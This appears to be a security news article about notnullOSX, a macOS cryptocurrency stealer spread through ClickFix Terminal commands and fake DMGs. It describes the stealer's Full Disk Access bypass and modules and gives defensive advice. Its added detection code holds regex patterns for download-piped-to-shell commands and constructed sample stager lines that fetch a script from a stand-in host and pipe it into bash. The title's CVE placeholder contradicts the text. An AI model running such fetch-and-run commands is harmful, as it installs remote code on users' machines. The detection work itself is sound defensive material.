ClickFix macOS Vulnerability (CVE-2023-XXXX) Lets Attackers Deliver notnullOSX

Emy Elsamnoudy
April 9, 2026

Key Takeaways

  • A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000.
  • The malware employs social engineering via a “ClickFix” method or malicious DMG files to bypass macOS security and gain Full Disk Access.
  • Developed by an individual known as 0xFFF, now operating as alh1mik, the stealer is highly targeted, with operators manually vetting victims through an affiliate panel.
  • notnullOSX uses a modular design to steal various data, including cryptocurrency wallet details, browser credentials, messages, and can even replace legitimate hardware wallet applications.
  • No specific CVE ID for the “ClickFix” social engineering method was provided in the source material, but the threat is active and requires immediate user vigilance.

A sophisticated new macOS information stealer, dubbed notnullOSX, has been identified, focusing its attacks on cryptocurrency investors holding over $10,000 in their digital wallets. Written in the Go programming language, this malware leverages two distinct infection vectors—a social engineering tactic referred to as “ClickFix” and the distribution of malicious Disk Image (DMG) files—to covertly compromise Apple Mac systems.

The operation behind notnullOSX is characterized by its precise targeting. Threat actors meticulously select each victim through a dedicated affiliate panel before initiating an attack, ensuring a high potential return on their efforts.

The Evolution of notnullOSX

The origins of notnullOSX trace back to 2022, when a developer known as 0xFFF first showcased an early version of a macOS stealer on underground hacking forums. Following a reported exit from the scene in 2023, allegedly due to a rival’s fabricated law enforcement tip, 0xFFF resurfaced in August 2024 under the new alias “alh1mik.” The individual issued an apology and began accepting preorders for a refined macOS stealer at a monthly subscription cost of $400. By 2026, this offering had materialized into the notnullOSX malware.

Researchers at Moonlock Lab recorded the first detections of notnullOSX on March 30, 2026, observing activity in Vietnam, Taiwan, and Spain. Their analysis confirmed the malware’s highly targeted nature. Before any attack, operators are required to submit a form detailing the victim’s social media profiles, cryptocurrency wallet addresses, and communication history. Submissions for victims with wallet balances below $10,000 are automatically rejected.

Initial Infection Chains

The attack typically commences with a deceptive Google document, which presents an encryption error and prompts the victim to choose one of two actions, both ultimately leading to malware installation. The first method, “ClickFix,” instructs the user to open Terminal and paste a base64-encoded command. This command surreptitiously retrieves and executes a remote bash installer script. The second approach involves a malicious DMG disk image, disguised as a routine file with a README, an installation script, and a Terminal shortcut. In both scenarios, victims unknowingly install the malware without triggering any security alerts.
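As an added example (not code from the article or from Moonlock Lab), here is detection logic a security team could run over shell history or process telemetry to flag the ClickFix shapes described above: a base64 blob decoded straight into a shell, and a download piped into a shell. The sample command lines and the example.invalid URL are constructed for the demo.

```python
import base64
import re

# Patterns for the two ClickFix shapes: a base64 blob decoded into a shell
# (macOS base64 accepts -D as well as -d), and a download piped into a shell.
BASE64_TO_SHELL = re.compile(r"base64\s+(?:-[dD]|--decode)\b.*\|\s*(?:ba|z)?sh\b")
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b")
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_blobs(cmd):
    """Best-effort decode of base64-looking tokens; tokens that fail validation are skipped."""
    decoded = []
    for m in B64_BLOB.finditer(cmd):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded

def classify(cmd):
    """Return the reasons a command line looks like a ClickFix stager (empty list if none)."""
    reasons = []
    if BASE64_TO_SHELL.search(cmd):
        reasons.append("base64 payload decoded into a shell")
    if FETCH_TO_SHELL.search(cmd):
        reasons.append("remote content piped into a shell")
    for text in decode_blobs(cmd):
        if FETCH_TOOL.search(text):
            reasons.append("decoded payload downloads something: " + text.strip())
    return reasons

def find_clickfix(commands):
    """Keep only the suspicious command lines, paired with their reasons."""
    return [(cmd, classify(cmd)) for cmd in commands if classify(cmd)]

# Constructed sample history lines (not captured from a real infection). The encoded
# stager is built at runtime so the base64 is valid; the host uses the reserved .invalid TLD.
STAGER = "curl -fsSL http://example.invalid/install.sh | bash"
SAMPLE_COMMANDS = [
    "ls -la ~/Documents",
    "echo " + base64.b64encode(STAGER.encode()).decode() + " | base64 -D | bash",
    "curl -fsSL https://example.invalid/setup.sh | sh",
    "git pull origin main",
    "echo aGVsbG8gd29ybGQ= | base64 -d",
]
```

Decoding the blob matters because the raw history line for the first vector contains no URL at all; only the decoded payload shows what is being fetched.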

The distribution infrastructure for notnullOSX extends to a fake product page for a wallpaper application named WallSpace, hosted at wallpapermacos[.]com. This page features professional screenshots and a prominent “free download” button. Furthermore, a long-dormant YouTube channel, inactive since 2015, was hijacked to promote the fake app. A single video on this channel garnered 50,000 views in just two weeks, suggesting either paid promotion or sophisticated SEO manipulation.

Inside the Attack: TCC Bypass and Modular Data Theft

A critical aspect of notnullOSX’s danger lies in its ability to subvert macOS’s native permission system. Apple’s Transparency, Consent, and Control (TCC) framework typically generates pop-up prompts when applications attempt to access sensitive user data, such as messages, notes, or browser cookies. notnullOSX circumvents this by manipulating victims into manually granting “Full Disk Access” within System Settings.

Granting this single permission bypasses all subsequent TCC prompts, allowing the malware unfettered access to all protected data categories without further user interaction. The malware employs a modular architecture, downloading specific binaries from its command-and-control (C2) server for each data exfiltration task. Identified modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.

The “ReplaceApp” module is particularly concerning. It silently substitutes legitimate hardware wallet applications, such as Ledger Live, with trojanized versions. These malicious clones are designed to intercept seed phrases during the setup process, so even users who rely on the added security of a hardware wallet are exposed once the wallet-management software on their Mac has been replaced.

Beyond data theft, notnullOSX maintains a persistent WebSocket connection to a Firebase-hosted C2 server. It sends regular heartbeats and awaits remote commands, exhibiting behavior more akin to a full-fledged remote access trojan (RAT) than a simple, one-time information stealer.

What You Should Do

  • For Security Teams: Block outbound connections to known C2 domains associated with notnullOSX. Implement alerts for any unrecognized applications requesting Full Disk Access. Monitor the /tmp directory for the staging of Mach-O binaries.
  • For Mac Users and Cryptocurrency Holders: Never paste Terminal commands from untrusted sources, such as web pages or documents. Exercise extreme caution with any application that requests Full Disk Access during installation, especially if its origin is unclear. Regularly inspect ~/Library/LaunchAgents/ for any unfamiliar or suspicious entries.
  • Practice General Cyber Hygiene: Keep your macOS operating system and all applications updated to the latest versions. Use strong, unique passwords and enable multi-factor authentication (MFA) wherever possible. Be wary of phishing attempts and suspicious links.
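An added example, not from the article, of the two host checks recommended for security teams above: listing Mach-O binaries staged in a directory by their magic number, and auditing LaunchAgents plists for programs that are missing or live in a temp directory. The staging paths and the fixture files built by run_demo() are assumptions; on a real Mac, find_macho would be pointed at /tmp and audit_launch_agents at ~/Library/LaunchAgents/.

```python
import os
import plistlib
import struct
import tempfile
# Magic numbers for 32/64-bit Mach-O in both byte orders, plus fat (universal) binaries.
MACHO_MAGICS = {0xFEEDFACE, 0xFEEDFACF, 0xCEFAEDFE, 0xCFFAEDFE, 0xCAFEBABE}
# Assumed staging locations on a real Mac; run_demo() swaps in a fixture directory instead.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
def is_macho(path):
    """True if the first four bytes of the file are a Mach-O or fat magic number."""
    with open(path, "rb") as f:
        head = f.read(4)
    return len(head) == 4 and struct.unpack(">I", head)[0] in MACHO_MAGICS
def find_macho(directory):
    """Recursively list Mach-O files under directory (on a real Mac: /tmp)."""
    return sorted(os.path.join(r, n) for r, _, fs in os.walk(directory)
                  for n in fs if is_macho(os.path.join(r, n)))

def audit_launch_agents(agents_dir, staging_dirs=STAGING_DIRS):
    """Return (plist name, program, reason) for agents that deserve a closer look."""
    findings = []
    for name in sorted(n for n in os.listdir(agents_dir) if n.endswith(".plist")):
        with open(os.path.join(agents_dir, name), "rb") as f:
            plist = plistlib.load(f)
        args = plist.get("ProgramArguments") or []
        program = plist.get("Program") or (args[0] if args else None)
        if not program:
            findings.append((name, None, "no Program or ProgramArguments"))
        elif program.startswith(tuple(staging_dirs)):
            findings.append((name, program, "program staged in a temp directory"))
        elif not os.path.exists(program):
            findings.append((name, program, "program path does not exist"))
    return findings

def run_demo():
    """Constructed fixture: a fake LaunchAgents dir and a fake /tmp holding a staged Mach-O."""
    root = tempfile.mkdtemp()
    agents, tmp = os.path.join(root, "LaunchAgents"), os.path.join(root, "tmp")
    os.makedirs(agents); os.makedirs(tmp)
    legit, staged = os.path.join(root, "legit.sh"), os.path.join(tmp, ".update")
    with open(legit, "wb") as f:
        f.write(b"#!/bin/sh\n")  # exists, is not Mach-O, is not in a staging dir
    with open(staged, "wb") as f:
        f.write(struct.pack(">I", 0xFEEDFACF) + b"\0" * 28)  # fake 64-bit Mach-O header
    agents_spec = {"com.example.legit": [legit], "com.example.updater": [staged, "-q"],
                   "com.example.ghost": [os.path.join(root, "gone")]}
    for label, args in agents_spec.items():
        with open(os.path.join(agents, label + ".plist"), "wb") as f:
            plistlib.dump({"Label": label, "ProgramArguments": args, "RunAtLoad": True}, f)
    return find_macho(tmp), audit_launch_agents(agents, staging_dirs=(tmp + os.sep,))
```

A hidden dotfile such as .update is still returned by os.walk, which is why the magic-number check rather than the filename drives the detection.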
